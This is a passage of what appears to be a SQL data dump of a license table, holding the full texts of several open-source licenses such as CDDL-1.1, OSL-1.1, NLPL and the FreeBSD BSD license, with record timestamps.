to the disclaimer\nof warranties. You may not distribute, publicly display, publicly perform,\nor publicly digitally perform the Work with any technological measures that\ncontrol access or use of the Work in a manner inconsistent with the terms\nof this License Agreement. The above applies to the Work as incorporated in\na Collective Work, but this does not require the Collective Work apart from\nthe Work itself to be made subject to the terms of this License. If You create\na Collective Work, upon notice from any Licensor You must, to the extent practicable,\nremove from the Collective Work any reference to such Licensor or the Original\nAuthor, as requested. If You create a Derivative Work, upon notice from any\nLicensor You must, to the extent practicable, remove from the Derivative Work\nany reference to such Licensor or the Original Author, as requested.\n\nb. You may distribute, publicly display, publicly perform, or publicly digitally\nperform a Derivative Work only under the terms of this License, and You must\ninclude a copy of, or the Uniform Resource Identifier for, this License with\nevery copy or phonorecord of each Derivative Work You distribute, publicly\ndisplay, publicly perform, or publicly digitally perform. You may not offer\nor impose any terms on the Derivative Works that alter or restrict the terms\nof this License or the recipients\' exercise of the rights granted hereunder,\nand You must keep intact all notices that refer to this License and to the\ndisclaimer of warranties. You may not distribute, publicly display, publicly\nperform, or publicly digitally perform the Derivative Work with any technological\nmeasures that control access or use of the Work in a manner inconsistent with\nthe terms of this License Agreement. The above applies to the Derivative Work\nas incorporated in a Collective Work, but this does not require the Collective\nWork apart from the Derivative Work itself to be made subject to the terms\nof this License.\n\nc. You may not exercise any of the rights granted to You in Section 3 above\nin any manner that is primarily intended for or directed toward commercial\nadvantage or private monetary compensation. The exchange of the Work for other\ncopyrighted works by means of digital file-sharing or otherwise shall not\nbe considered to be intended for or directed toward commercial advantage or\nprivate monetary compensation, provided there is no payment of any monetary\ncompensation in connection with the exchange of copyrighted works.\n\nd. If you distribute, publicly display, publicly perform, or publicly digitally\nperform the Work or any Derivative Works or Collective Works, You must keep\nintact all copyright notices for the Work and give the Original Author credit\nreasonable to the medium or means You are utilizing by conveying the name\n(or pseudonym if applicable) of the Original Author if supplied; the title\nof the Work if supplied; in the case of a Derivative Work, a credit identifying\nthe use of the Work in the Derivative Work (e.g., \"French translation of the\nWork by Original Author,\" or \"Screenplay based on original Work by Original\nAuthor\"). Such credit may be implemented in any reasonable manner; provided,\nhowever, that in the case of a Derivative Work or Collective Work, at a minimum\nsuch credit will appear where any other comparable authorship credit appears\nand in a manner at least as prominent as such other comparable authorship\ncredit.\n\n 5. Representations, Warranties and Disclaimer\n\na. By offering the Work for public release under this License, Licensor represents\nand warrants that, to the best of Licensor\'s knowledge after reasonable inquiry:\n\ni. Licensor has secured all rights in the Work necessary to grant the license\nrights hereunder and to permit the lawful exercise of the rights granted hereunder\nwithout You having any obligation to pay any royalties, compulsory license\nfees, residuals or any other payments;\n\nii. The Work does not infringe the copyright, trademark, publicity rights,\ncommon law rights or any other right of any third party or constitute defamation,\ninvasion of privacy or other tortious injury to any third party.\n\nb. EXCEPT AS EXPRESSLY STATED IN THIS LICENSE OR OTHERWISE AGREED IN WRITING\nOR REQUIRED BY APPLICABLE LAW, THE WORK IS LICENSED ON AN \"AS IS\" BASIS, WITHOUT\nWARRANTIES OF ANY KIND, EITHER EXPRESS OR IMPLIED INCLUDING, WITHOUT LIMITATION,\nANY WARRANTIES REGARDING THE CONTENTS OR ACCURACY OF THE WORK.\n\n6. Limitation on Liability. EXCEPT TO THE EXTENT REQUIRED BY APPLICABLE LAW,\nAND EXCEPT FOR DAMAGES ARISING FROM LIABILITY TO A THIRD PARTY RESULTING FROM\nBREACH OF THE WARRANTIES IN SECTION 5, IN NO EVENT WILL LICENSOR BE LIABLE\nTO YOU ON ANY LEGAL THEORY FOR ANY SPECIAL, INCIDENTAL, CONSEQUENTIAL, PUNITIVE\nOR EXEMPLARY DAMAGES ARISING OUT OF THIS LICENSE OR THE USE OF THE WORK, EVEN\nIF LICENSOR HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.\n\n 7. Termination\n\na. This License and the rights granted hereunder will terminate automatically\nupon any breach by You of the terms of this License. Individuals or entities\nwho have received Derivative Works or Collective Works from You under this\nLicense, however, will not have their licenses terminated provided such individuals\nor entities remain in full compliance with those licenses. Sections 1, 2,\n5, 6, 7, and 8 will survive any termination of this License.\n\nb. Subject to the above terms and conditions, the license granted here is\nperpetual (for the duration of the applicable copyright in the Work). Notwithstanding\nthe above, Licensor reserves the right to release the Work under different\nlicense terms or to stop distributing the Work at any time; provided, however\nthat any such election will not serve to withdraw this License (or any other\nlicense that has been, or is required to be, granted under the terms of this\nLicense), and this License will continue in full force and effect unless terminated\nas stated above.\n\n 8. Miscellaneous\n\na. Each time You distribute or publicly digitally perform the Work or a Collective\nWork, the Licensor offers to the recipient a license to the Work on the same\nterms and conditions as the license granted to You under this License.\n\nb. Each time You distribute or publicly digitally perform a Derivative Work,\nLicensor offers to the recipient a license to the original Work on the same\nterms and conditions as the license granted to You under this License.\n\nc. If any provision of this License is invalid or unenforceable under applicable\nlaw, it shall not affect the validity or enforceability of the remainder of\nthe terms of this License, and without further action by the parties to this\nagreement, such provision shall be reformed to the minimum extent necessary\nto make such provision valid and enforceable.\n\nd. No term or provision of this License shall be deemed waived and no breach\nconsented to unless such waiver or consent shall be in writing and signed\nby the party to be charged with such waiver or consent.\n\ne. This License constitutes the entire agreement between the parties with\nrespect to the Work licensed here. There are no understandings, agreements\nor representations with respect to the Work not specified here. Licensor shall\nnot be bound by any additional provisions that may appear in any communication\nfrom You. This License may not be modified without the mutual written agreement\nof the Licensor and You.\n\nCreative Commons is not a party to this License, and makes no warranty whatsoever\nin connection with the Work. Creative Commons will not be liable to You or\nany party on any legal theory for any damages whatsoever, including without\nlimitation any general, special, incidental or consequential damages arising\nin connection to this license. Notwithstanding the foregoing two (2) sentences,\nif Creative Commons has expressly identified itself as the Licensor hereunder,\nit shall have all rights and obligations of Licensor.\n\nExcept for the limited purpose of indicating to the public that the Work is\nlicensed under the CCPL, neither party will use the trademark \"Creative Commons\"\nor any related trademark or logo of Creative Commons without the prior written\nconsent of Creative Commons. Any permitted use will be in compliance with\nCreative Commons\' then-current trademark usage guidelines, as may be published\non its website or otherwise made available upon request from time to time.\n\nCreative Commons may be contacted at http://creativecommons.org/.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(107,'CDDL-1.1','COMMON DEVELOPMENT AND DISTRIBUTION LICENSE (CDDL)\n\nVersion 1.1\n\n 1. Definitions.\n\n1.1. \"Contributor\" means each individual or entity that creates or contributes\nto the creation of Modifications.\n\n1.2. \"Contributor Version\" means the combination of the Original Software,\nprior Modifications used by a Contributor (if any), and the Modifications\nmade by that particular Contributor.\n\n1.3. \"Covered Software\" means (a) the Original Software, or (b) Modifications,\nor (c) the combination of files containing Original Software with files containing\nModifications, in each case including portions thereof.\n\n1.4. \"Executable\" means the Covered Software in any form other than Source\nCode.\n\n1.5. \"Initial Developer\" means the individual or entity that first makes Original\nSoftware available under this License.\n\n1.6. \"Larger Work\" means a work which combines Covered Software or portions\nthereof with code not governed by the terms of this License.\n\n 1.7. \"License\" means this document.\n\n1.8. \"Licensable\" means having the right to grant, to the maximum extent possible,\nwhether at the time of the initial grant or subsequently acquired, any and\nall of the rights conveyed herein.\n\n1.9. \"Modifications\" means the Source Code and Executable form of any of the\nfollowing:\n\nA. Any file that results from an addition to, deletion from or modification\nof the contents of a file containing Original Software or previous Modifications;\n\nB. Any new file that contains any part of the Original Software or previous\nModification; or\n\nC. Any new file that is contributed or otherwise made available under the\nterms of this License.\n\n1.10. \"Original Software\" means the Source Code and Executable form of computer\nsoftware code that is originally released under this License.\n\n1.11. \"Patent Claims\" means any patent claim(s), now owned or hereafter acquired,\nincluding without limitation, method, process, and apparatus claims, in any\npatent Licensable by grantor.\n\n1.12. \"Source Code\" means (a) the common form of computer software code in\nwhich modifications are made and (b) associated documentation included in\nor with such code.\n\n1.13. \"You\" (or \"Your\") means an individual or a legal entity exercising rights\nunder, and complying with all of the terms of, this License. For legal entities,\n\"You\" includes any entity which controls, is controlled by, or is under common\ncontrol with You. For purposes of this definition, \"control\" means (a) the\npower, direct or indirect, to cause the direction or management of such entity,\nwhether by contract or otherwise, or (b) ownership of more than fifty percent\n(50%) of the outstanding shares or beneficial ownership of such entity.\n\n 2. License Grants.\n\n 2.1. The Initial Developer Grant.\n\nConditioned upon Your compliance with Section 3.1 below and subject to third\nparty intellectual property claims, the Initial Developer hereby grants You\na world-wide, royalty-free, non-exclusive license:\n\n(a) under intellectual property rights (other than patent or trademark) Licensable\nby Initial Developer, to use, reproduce, modify, display, perform, sublicense\nand distribute the Original Software (or portions thereof), with or without\nModifications, and/or as part of a Larger Work; and\n\n(b) under Patent Claims infringed by the making, using or selling of Original\nSoftware, to make, have made, use, practice, sell, and offer for sale, and/or\notherwise dispose of the Original Software (or portions thereof).\n\n(c) The licenses granted in Sections 2.1(a) and (b) are effective on the date\nInitial Developer first distributes or otherwise makes the Original Software\navailable to a third party under the terms of this License.\n\n(d) Notwithstanding Section 2.1(b) above, no patent license is granted: (1)\nfor code that You delete from the Original Software, or (2) for infringements\ncaused by: (i) the modification of the Original Software, or (ii) the combination\nof the Original Software with other software or devices.\n\n 2.2. Contributor Grant.\n\nConditioned upon Your compliance with Section 3.1 below and subject to third\nparty intellectual property claims, each Contributor hereby grants You a world-wide,\nroyalty-free, non-exclusive license:\n\n(a) under intellectual property rights (other than patent or trademark) Licensable\nby Contributor to use, reproduce, modify, display, perform, sublicense and\ndistribute the Modifications created by such Contributor (or portions thereof),\neither on an unmodified basis, with other Modifications, as Covered Software\nand/or as part of a Larger Work; and\n\n(b) under Patent Claims infringed by the making, using, or selling of Modifications\nmade by that Contributor either alone and/or in combination with its Contributor\nVersion (or portions of such combination), to make, use, sell, offer for sale,\nhave made, and/or otherwise dispose of: (1) Modifications made by that Contributor\n(or portions thereof); and (2) the combination of Modifications made by that\nContributor with its Contributor Version (or portions of such combination).\n\n(c) The licenses granted in Sections 2.2(a) and 2.2(b) are effective on the\ndate Contributor first distributes or otherwise makes the Modifications available\nto a third party.\n\n(d) Notwithstanding Section 2.2(b) above, no patent license is granted: (1)\nfor any code that Contributor has deleted from the Contributor Version; (2)\nfor infringements caused by: (i) third party modifications of Contributor\nVersion, or (ii) the combination of Modifications made by that Contributor\nwith other software (except as part of the Contributor Version) or other devices;\nor (3) under Patent Claims infringed by Covered Software in the absence of\nModifications made by that Contributor.\n\n 3. Distribution Obligations.\n\n 3.1. Availability of Source Code.\n\nAny Covered Software that You distribute or otherwise make available in Executable\nform must also be made available in Source Code form and that Source Code\nform must be distributed only under the terms of this License. You must include\na copy of this License with every copy of the Source Code form of the Covered\nSoftware You distribute or otherwise make available. You must inform recipients\nof any such Covered Software in Executable form as to how they can obtain\nsuch Covered Software in Source Code form in a reasonable manner on or through\na medium customarily used for software exchange.\n\n 3.2. Modifications.\n\nThe Modifications that You create or to which You contribute are governed\nby the terms of this License. You represent that You believe Your Modifications\nare Your original creation(s) and/or You have sufficient rights to grant the\nrights conveyed by this License.\n\n 3.3. Required Notices.\n\nYou must include a notice in each of Your Modifications that identifies You\nas the Contributor of the Modification. You may not remove or alter any copyright,\npatent or trademark notices contained within the Covered Software, or any\nnotices of licensing or any descriptive text giving attribution to any Contributor\nor the Initial Developer.\n\n 3.4. Application of Additional Terms.\n\nYou may not offer or impose any terms on any Covered Software in Source Code\nform that alters or restricts the applicable version of this License or the\nrecipients\' rights hereunder. You may choose to offer, and to charge a fee\nfor, warranty, support, indemnity or liability obligations to one or more\nrecipients of Covered Software. However, you may do so only on Your own behalf,\nand not on behalf of the Initial Developer or any Contributor. You must make\nit absolutely clear that any such warranty, support, indemnity or liability\nobligation is offered by You alone, and You hereby agree to indemnify the\nInitial Developer and every Contributor for any liability incurred by the\nInitial Developer or such Contributor as a result of warranty, support, indemnity\nor liability terms You offer.\n\n 3.5. Distribution of Executable Versions.\n\nYou may distribute the Executable form of the Covered Software under the terms\nof this License or under the terms of a license of Your choice, which may\ncontain terms different from this License, provided that You are in compliance\nwith the terms of this License and that the license for the Executable form\ndoes not attempt to limit or alter the recipient\'s rights in the Source Code\nform from the rights set forth in this License. If You distribute the Covered\nSoftware in Executable form under a different license, You must make it absolutely\nclear that any terms which differ from this License are offered by You alone,\nnot by the Initial Developer or Contributor. You hereby agree to indemnify\nthe Initial Developer and every Contributor for any liability incurred by\nthe Initial Developer or such Contributor as a result of any such terms You\noffer.\n\n 3.6. Larger Works.\n\nYou may create a Larger Work by combining Covered Software with other code\nnot governed by the terms of this License and distribute the Larger Work as\na single product. In such a case, You must make sure the requirements of this\nLicense are fulfilled for the Covered Software.\n\n 4. Versions of the License.\n\n 4.1. New Versions.\n\nOracle is the initial license steward and may publish revised and/or new versions\nof this License from time to time. Each version will be given a distinguishing\nversion number. Except as provided in Section 4.3, no one other than the license\nsteward has the right to modify this License.\n\n 4.2. Effect of New Versions.\n\nYou may always continue to use, distribute or otherwise make the Covered Software\navailable under the terms of the version of the License under which You originally\nreceived the Covered Software. If the Initial Developer includes a notice\nin the Original Software prohibiting it from being distributed or otherwise\nmade available under any subsequent version of the License, You must distribute\nand make the Covered Software available under the terms of the version of\nthe License under which You originally received the Covered Software. Otherwise,\nYou may also choose to use, distribute or otherwise make the Covered Software\navailable under the terms of any subsequent version of the License published\nby the license steward.\n\n 4.3. Modified Versions.\n\nWhen You are an Initial Developer and You want to create a new license for\nYour Original Software, You may create and use a modified version of this\nLicense if You: (a) rename the license and remove any references to the name\nof the license steward (except to note that the license differs from this\nLicense); and (b) otherwise make it clear that the license contains terms\nwhich differ from this License.\n\n 5. DISCLAIMER OF WARRANTY.\n\nCOVERED SOFTWARE IS PROVIDED UNDER THIS LICENSE ON AN \"AS IS\" BASIS, WITHOUT\nWARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, WITHOUT LIMITATION,\nWARRANTIES THAT THE COVERED SOFTWARE IS FREE OF DEFECTS, MERCHANTABLE, FIT\nFOR A PARTICULAR PURPOSE OR NON-INFRINGING. THE ENTIRE RISK AS TO THE QUALITY\nAND PERFORMANCE OF THE COVERED SOFTWARE IS WITH YOU. SHOULD ANY COVERED SOFTWARE\nPROVE DEFECTIVE IN ANY RESPECT, YOU (NOT THE INITIAL DEVELOPER OR ANY OTHER\nCONTRIBUTOR) ASSUME THE COST OF ANY NECESSARY SERVICING, REPAIR OR CORRECTION.\nTHIS DISCLAIMER OF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS LICENSE.\nNO USE OF ANY COVERED SOFTWARE IS AUTHORIZED HEREUNDER EXCEPT UNDER THIS DISCLAIMER.\n\n 6. TERMINATION.\n\n6.1. This License and the rights granted hereunder will terminate automatically\nif You fail to comply with terms herein and fail to cure such breach within\n30 days of becoming aware of the breach. Provisions which, by their nature,\nmust remain in effect beyond the termination of this License shall survive.\n\n6.2. If You assert a patent infringement claim (excluding declaratory judgment\nactions) against Initial Developer or a Contributor (the Initial Developer\nor Contributor against whom You assert such claim is referred to as \"Participant\")\nalleging that the Participant Software (meaning the Contributor Version where\nthe Participant is a Contributor or the Original Software where the Participant\nis the Initial Developer) directly or indirectly infringes any patent, then\nany and all rights granted directly or indirectly to You by such Participant,\nthe Initial Developer (if the Initial Developer is not the Participant) and\nall Contributors under Sections 2.1 and/or 2.2 of this License shall, upon\n60 days notice from Participant terminate prospectively and automatically\nat the expiration of such 60 day notice period, unless if within such 60 day\nperiod You withdraw Your claim with respect to the Participant Software against\nsuch Participant either unilaterally or pursuant to a written agreement with\nParticipant.\n\n6.3. If You assert a patent infringement claim against Participant alleging\nthat the Participant Software directly or indirectly infringes any patent\nwhere such claim is resolved (such as by license or settlement) prior to the\ninitiation of patent infringement litigation, then the reasonable value of\nthe licenses granted by such Participant under Sections 2.1 or 2.2 shall be\ntaken into account in determining the amount or value of any payment or license.\n\n6.4. In the event of termination under Sections 6.1 or 6.2 above, all end\nuser licenses that have been validly granted by You or any distributor hereunder\nprior to termination (excluding licenses granted to You by any distributor)\nshall survive termination.\n\n 7. LIMITATION OF LIABILITY.\n\nUNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY, WHETHER TORT (INCLUDING\nNEGLIGENCE), CONTRACT, OR OTHERWISE, SHALL YOU, THE INITIAL DEVELOPER, ANY\nOTHER CONTRIBUTOR, OR ANY DISTRIBUTOR OF COVERED SOFTWARE, OR ANY SUPPLIER\nOF ANY OF SUCH PARTIES, BE LIABLE TO ANY PERSON FOR ANY INDIRECT, SPECIAL,\nINCIDENTAL, OR CONSEQUENTIAL DAMAGES OF ANY CHARACTER INCLUDING, WITHOUT LIMITATION,\nDAMAGES FOR LOSS OF GOODWILL, WORK STOPPAGE, COMPUTER FAILURE OR MALFUNCTION,\nOR ANY AND ALL OTHER COMMERCIAL DAMAGES OR LOSSES, EVEN IF SUCH PARTY SHALL\nHAVE BEEN INFORMED OF THE POSSIBILITY OF SUCH DAMAGES. THIS LIMITATION OF\nLIABILITY SHALL NOT APPLY TO LIABILITY FOR DEATH OR PERSONAL INJURY RESULTING\nFROM SUCH PARTY\'S NEGLIGENCE TO THE EXTENT APPLICABLE LAW PROHIBITS SUCH LIMITATION.\nSOME JURISDICTIONS DO NOT ALLOW THE EXCLUSION OR LIMITATION OF INCIDENTAL\nOR CONSEQUENTIAL DAMAGES, SO THIS EXCLUSION AND LIMITATION MAY NOT APPLY TO\nYOU.\n\n 8. U.S. GOVERNMENT END USERS.\n\nThe Covered Software is a \"commercial item,\" as that term is defined in 48\nC.F.R. 2.101 (Oct. 1995), consisting of \"commercial computer software\" (as\nthat term is defined at 48 C.F.R. § 252.227-7014(a)(1)) and \"commercial computer\nsoftware documentation\" as such terms are used in 48 C.F.R. 12.212 (Sept.\n1995). Consistent with 48 C.F.R. 12.212 and 48 C.F.R. 227.7202-1 through 227.7202-4\n(June 1995), all U.S. Government End Users acquire Covered Software with only\nthose rights set forth herein. This U.S. Government Rights clause is in lieu\nof, and supersedes, any other FAR, DFAR, or other clause or provision that\naddresses Government rights in computer software under this License.\n\n 9. MISCELLANEOUS.\n\nThis License represents the complete agreement concerning subject matter hereof.\nIf any provision of this License is held to be unenforceable, such provision\nshall be reformed only to the extent necessary to make it enforceable. This\nLicense shall be governed by the law of the jurisdiction specified in a notice\ncontained within the Original Software (except to the extent applicable law,\nif any, provides otherwise), excluding such jurisdiction\'s conflict-of-law\nprovisions. Any litigation relating to this License shall be subject to the\njurisdiction of the courts located in the jurisdiction and venue specified\nin a notice contained within the Original Software, with the losing party\nresponsible for costs, including, without limitation, court costs and reasonable\nattorneys\' fees and expenses. The application of the United Nations Convention\non Contracts for the International Sale of Goods is expressly excluded. Any\nlaw or regulation which provides that the language of a contract shall be\nconstrued against the drafter shall not apply to this License. You agree that\nYou alone are responsible for compliance with the United States export administration\nregulations (and the export control laws and regulation of any other countries)\nwhen You use, distribute or otherwise make available any Covered Software.\n\n 10. RESPONSIBILITY FOR CLAIMS.\n\nAs between Initial Developer and the Contributors, each party is responsible\nfor claims and damages arising, directly or indirectly, out of its utilization\nof rights under this License and You agree to work with Initial Developer\nand Contributors to distribute such responsibility on an equitable basis.\nNothing herein is intended or shall be deemed to constitute any admission\nof liability.\n\nNOTICE PURSUANT TO SECTION 9 OF THE COMMON DEVELOPMENT AND DISTRIBUTION LICENSE\n(CDDL)\n\nThe code released under the CDDL shall be governed by the laws of the State\nof California (excluding conflict-of-law provisions). Any litigation relating\nto this License shall be subject to the jurisdiction of the Federal Courts\nof the Northern District of California and the state courts of the State of\nCalifornia, with venue lying in Santa Clara County, California.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(108,'OSL-1.1','The Open Software License v. 1.1\n\nThis Open Software License (the \"License\") applies to any original work of\nauthorship (the \"Original Work\") whose owner (the \"Licensor\") has placed the\nfollowing notice immediately following the copyright notice for the Original\nWork:\n\nLicensed under the Open Software License version 1.1\n\n1) Grant of Copyright License. Licensor hereby grants You a world-wide, royalty-free,\nnon-exclusive, perpetual, non-sublicenseable license to do the following:\n\n a) to reproduce the Original Work in copies;\n\nb) to prepare derivative works (\"Derivative Works\") based upon the Original\nWork;\n\nc) to distribute copies of the Original Work and Derivative Works to the public,\nwith the proviso that copies of Original Work or Derivative Works that You\ndistribute shall be licensed under the Open Software License;\n\n d) to perform the Original Work publicly; and\n\n e) to display the Original Work publicly.\n\n2) Grant of Patent License. Licensor hereby grants You a world-wide, royalty-free,\nnon-exclusive, perpetual, non-sublicenseable license, under patent claims\nowned or controlled by the Licensor that are embodied in the Original Work\nas furnished by the Licensor (\"Licensed Claims\") to make, use, sell and offer\nfor sale the Original Work. Licensor hereby grants You a world-wide, royalty-free,\nnon-exclusive, perpetual, non-sublicenseable license under the Licensed Claims\nto make, use, sell and offer for sale Derivative Works.\n\n3) Grant of Source Code License. The term \"Source Code\" means the preferred\nform of the Original Work for making modifications to it and all available\ndocumentation describing how to modify the Original Work. Licensor hereby\nagrees to provide a machine-readable copy of the Source Code of the Original\nWork along with each copy of the Original Work that Licensor distributes.\nLicensor reserves the right to satisfy this obligation by placing a machine-readable\ncopy of the Source Code in an information repository reasonably calculated\nto permit inexpensive and convenient access by You for as long as Licensor\ncontinues to distribute the Original Work, and by publishing the address of\nthat information repository in a notice immediately following the copyright\nnotice that applies to the Original Work.\n\n4) Exclusions From License Grant. Nothing in this License shall be deemed\nto grant any rights to trademarks, copyrights, patents, trade secrets or any\nother intellectual property of Licensor except as expressly stated herein.\nNo patent license is granted to make, use, sell or offer to sell embodiments\nof any patent claims other than the Licensed Claims defined in Section 2.\nNo right is granted to the trademarks of Licensor even if such marks are included\nin the Original Work. Nothing in this License shall be interpreted to prohibit\nLicensor from licensing under different terms from this License any Original\nWork that Licensor otherwise would have a right to license.\n\n5) External Deployment. The term \"External Deployment\" means the use or distribution\nof the Original Work or Derivative Works in any way such that the Original\nWork or Derivative Works may be used by anyone other than You, whether the\nOriginal Work or Derivative Works are distributed to those persons or made\navailable as an application intended for use over a computer network. As an\nexpress condition for the grants of license hereunder, You agree that any\nExternal Deployment by You of a Derivative Work shall be deemed a distribution\nand shall be licensed to all under the terms of this License, as prescribed\nin section 1(c) herein.\n\n6) Attribution Rights. You must retain, in the Source Code of any Derivative\nWorks that You create, all copyright, patent or trademark notices from the\nSource Code of the Original Work, as well as any notices of licensing and\nany descriptive text identified therein as an \"Attribution Notice.\" You must\ncause the Source Code for any Derivative Works that You create to carry a\nprominent Attribution Notice reasonably calculated to inform recipients that\nYou have modified the Original Work.\n\n7) Warranty and Disclaimer of Warranty. Licensor warrants that the copyright\nin and to the Original Work is owned by the Licensor or that the Original\nWork is distributed by Licensor under a valid current license from the copyright\nowner. Except as expressly stated in the immediately proceeding sentence,\nthe Original Work is provided under this License on an \"AS IS\" BASIS and WITHOUT\nWARRANTY, either express or implied, including, without limitation, the warranties\nof NON-INFRINGEMENT, MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\nTHE ENTIRE RISK AS TO THE QUALITY OF THE ORIGINAL WORK IS WITH YOU. This DISCLAIMER\nOF WARRANTY constitutes an essential part of this License. No license to Original\nWork is granted hereunder except under this disclaimer.\n\n8) Limitation of Liability. Under no circumstances and under no legal theory,\nwhether in tort (including negligence), contract, or otherwise, shall the\nLicensor be liable to any person for any direct, indirect, special, incidental,\nor consequential damages of any character arising as a result of this License\nor the use of the Original Work including, without limitation, damages for\nloss of goodwill, work stoppage, computer failure or malfunction, or any and\nall other commercial damages or losses. This limitation of liability shall\nnot apply to liability for death or personal injury resulting from Licensor\'s\nnegligence to the extent applicable law prohibits such limitation. Some jurisdictions\ndo not allow the exclusion or limitation of incidental or consequential damages,\nso this exclusion and limitation may not apply to You.\n\n9) Acceptance and Termination. If You distribute copies of the Original Work\nor a Derivative Work, You must make a reasonable effort under the circumstances\nto obtain the express and volitional assent of recipients to the terms of\nthis License. Nothing else but this License (or another written agreement\nbetween Licensor and You) grants You permission to create Derivative Works\nbased upon the Original Work or to exercise any of the rights granted in Sections\n1 herein, and any attempt to do so except under the terms of this License\n(or another written agreement between Licensor and You) is expressly prohibited\nby U.S. copyright law, the equivalent laws of other countries, and by international\ntreaty. Therefore, by exercising any of the rights granted to You in Sections\n1 herein, You indicate Your acceptance of this License and all of its terms\nand conditions. This License shall terminate immediately and you may no longer\nexercise any of the rights granted to You by this License upon Your failure\nto honor the proviso in Section 1(c) herein.\n\n10) Mutual Termination for Patent Action. This License shall terminate automatically\nand You may no longer exercise any of the rights granted to You by this License\nif You file a lawsuit in any court alleging that any OSI Certified open source\nsoftware that is licensed under any license containing this \"Mutual Termination\nfor Patent Action\" clause infringes any patent claims that are essential to\nuse that software.\n\n11) Jurisdiction, Venue and Governing Law. Any action or suit relating to\nthis License may be brought only in the courts of a jurisdiction wherein the\nLicensor resides or in which Licensor conducts its primary business, and under\nthe laws of that jurisdiction excluding its conflict-of-law provisions. The\napplication of the United Nations Convention on Contracts for the International\nSale of Goods is expressly excluded. Any use of the Original Work outside\nthe scope of this License or after its termination shall be subject to the\nrequirements and penalties of the U.S. Copyright Act, 17 U.S.C. å¤ 101 et\nseq., the equivalent laws of other countries, and international treaty. This\nsection shall survive the termination of this License.\n\n12) Attorneys Fees. In any action to enforce the terms of this License or\nseeking damages relating thereto, the prevailing party shall be entitled to\nrecover its costs and expenses, including, without limitation, reasonable\nattorneys\' fees and costs incurred in connection with such action, including\nany appeal of such action. This section shall survive the termination of this\nLicense.\n\n13) Miscellaneous. This License represents the complete agreement concerning\nthe subject matter hereof. If any provision of this License is held to be\nunenforceable, such provision shall be reformed only to the extent necessary\nto make it enforceable.\n\n14) Definition of \"You\" in This License. \"You\" throughout this License, whether\nin upper or lower case, means an individual or a legal entity exercising rights\nunder, and complying with all of the terms of, this License. For legal entities,\n\"You\" includes any entity that controls, is controlled by, or is under common\ncontrol with you. For purposes of this definition, \"control\" means (i) the\npower, direct or indirect, to cause the direction or management of such entity,\nwhether by contract or otherwise, or (ii) ownership of fifty percent (50%)\nor more of the outstanding shares, or (iii) beneficial ownership of such entity.\n\n15) Right to Use. You may use the Original Work in all ways not otherwise\nrestricted or conditioned by this License or by law, and Licensor promises\nnot to interfere with or be responsible for such uses by You.\n\nThis license is Copyright (C) 2002 Lawrence E. Rosen. All rights reserved.\nPermission is hereby granted to copy and distribute this license without modification.\nThis license may not be modified without the express written permission of\nits copyright owner.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(109,'NLPL','NO LIMIT PUBLIC LICENSE\n\nVersion 0, June 2012 Gilles LAMIRAL\n\nLa Billais\n\n35580 Baulon\n\nFrance NO LIMIT PUBLIC LICENSE\n\nTerms and conditions for copying, distribution, modification or anything else.\n\n 0. No limit to do anything with this work and this license.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(110,'BSD-2-Clause-FreeBSD','The FreeBSD Copyright\n\nCopyright 1992-2012 The FreeBSD Project. All rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n1. Redistributions of source code must retain the above copyright notice,\nthis list of conditions and the following disclaimer.\n\n2. Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\nTHIS SOFTWARE IS PROVIDED BY THE FREEBSD PROJECT ``AS IS\'\' AND ANY EXPRESS\nOR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES\nOF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN\nNO EVENT SHALL THE FREEBSD PROJECT OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,\nINDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\nBUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\nDATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY\nOF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\nOR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF\nADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nThe views and conclusions contained in the software and documentation are\nthose of the authors and should not be interpreted as representing official\npolicies, either expressed or implied, of the FreeBSD Project.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(111,'SGI-B-1.1','SGI FREE SOFTWARE LICENSE B\n\n(Version 1.1 02/22/2000)\n\n 1. Definitions.\n\n1.1 \"Additional Notice Provisions\" means such additional provisions as appear\nin the Notice in Original Code under the heading \"Additional Notice Provisions.\"\n\n1.2 \"Covered Code\" means the Original Code or Modifications, or any combination\nthereof.\n\n1.3 \"Hardware\" means any physical device that accepts input, processes input,\nstores the results of processing, and/or provides output.\n\n1.4 \"Larger Work\" means a work that combines Covered Code or portions thereof\nwith code not governed by the terms of this License.\n\n1.5 \"Licensable\" means having the right to grant, to the maximum extent possible,\nwhether at the time of the initial grant or subsequently acquired, any and\nall of the rights conveyed herein.\n\n 1.6 \"License\" means this document.\n\n1.7 \"Licensed Patents\" means patent claims Licensable by SGI that are infringed\nby the use or sale of Original Code or any Modifications provided by SGI,\nor any combination thereof.\n\n1.8 \"Modifications\" means any addition to or deletion from the substance or\nstructure of the Original Code or any previous Modifications. When Covered\nCode is released as a series of files, a Modification is:\n\nA. Any addition to the contents of a file containing Original Code and/or\naddition to or deletion from the contents of a file containing previous Modifications.\n\nB. Any new file that contains any part of the Original Code or previous Modifications.\n\n1.9 \"Notice\" means any notice in Original Code or Covered Code, as required\nby and in compliance with this License.\n\n1.10 \"Original Code\" means source code of computer software code that is described\nin the source code Notice required by Exhibit A as Original Code, and updates\nand error corrections specifically thereto.\n\n1.11 \"Recipient\" means an 